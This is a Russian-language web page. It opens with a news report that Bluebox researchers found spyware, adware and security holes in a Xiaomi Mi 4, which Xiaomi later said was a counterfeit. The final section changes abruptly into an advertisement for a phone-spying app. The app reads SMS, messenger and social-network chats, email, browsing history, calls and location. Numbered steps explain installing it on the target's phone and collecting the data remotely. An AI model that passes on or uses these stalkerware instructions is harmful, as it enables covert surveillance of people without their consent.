В смартфоне Xiaomi Mi 4 обнаружено вредоносное ПО

a4ac1fe3d72af8676e4e5a370982a4faКитайские мобильные телефоны пользуются большим спросом во всех уголках земного шара, а в 90% смартфонов из этой страны устанавливается операционная система Google Android. Главная же особенность китайского рынка в том, что сертифицированный вариант прошивки имеется лишь у 10% мобильников, к программному обеспечению остальных смартфонов корпорация Google не имеет никакого отношения. В итоге получается, что каждый производитель разрабатывает прошивку самостоятельно. А порой и устанавливает весьма сомнительный софт, который может собирать конфиденциальную информацию из трубки и всячески шпионить за действиями пользователя.

Специалисты по безопасности из компании Bluebox решили приобрести китайский Xiaomi Mi 4 и произвести его тестирование. В итоге там было обнаружено шесть программ, которые могут вызывать определённые подозрения. Это и шпионские модули, и вредоносное ПО для сбора информации. Фактически — это трояны, вшитые в прошивку изначально! Также есть там и ПО, которое занимается распространением навязчивой рекламы. Вполне очевидно, что зарабатывать на этом могут и сами владельцы торговой марки Xiaomi, и поставщики продукции.

Контролировать рынок Поднебесной практически невозможно, а все американские и европейские патентные права там с успехом игнорируются. Приводит это к массовому воровству дизайнерских идей, а порой и к использованию приложений от известных фирм, которые были нелегально переделаны. Ранее корпорация Google уже заявляла, что требует от китайских производителей честности и открытости в отношении своих торговых марок.

Купленный смартфон предварительно проверили на легитимность. Оказалось, что программа «Mi Identification» там присутствует, и этот мобильный телефон действительно является сертифицированным продуктом Xiaomi. Дальнейшие исследования показали наличие в памяти огромного количества брешей и программных ошибок, которые могут приводить к утечке информации и ряду иных неприятных последствий. Бреши в безопасности активно используются злоумышленниками для взлома защиты. Результатом становятся, например, утери банковских реквизитов, или паролей для доступа к аккаунтам социальных сетей.

Официально модель Xiaomi Mi 4 выпускается с прошивкой Android 4.4.4 KitKat, однако реальность показала, что программная оболочка включает в себя смесь KitKat и более ранних версий данной ОС. Вместе с прошлыми версиями перекочевали и все те ошибки, которые в KitKat были устранены разработчиками. Тестеры из Bluebox не исключают вероятности того, что оболочка могла быть изменена посторонними лицами, поскольку ОС Android является полностью открытой и доступной для программистов. Трудно определить, использовались ли бреши в защите для реальных атак, или же служили своеобразным инструментом тестирования предпочтений пользователей.

После опубликованного отчёта поднялась большая шумиха в СМИ, компании Xiaomi пришлось держать ответ. Пришлось произвести тщательное внутреннее расследование. Оно показало, что протестированная модель Xiaomi Mi 4 действительно была подделкой, но очень качественной. Ныне производителем контролируется вся цепь поставок до розничных магазинов. Также рекомендовано заказывать продукцию компании через официальный сайт. Это не только станет гарантией качественной сборки, но и отсутствия вредоносного ПО (вкупе со шпионскими модулями) в первоначально имеющейся программной оболочке.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.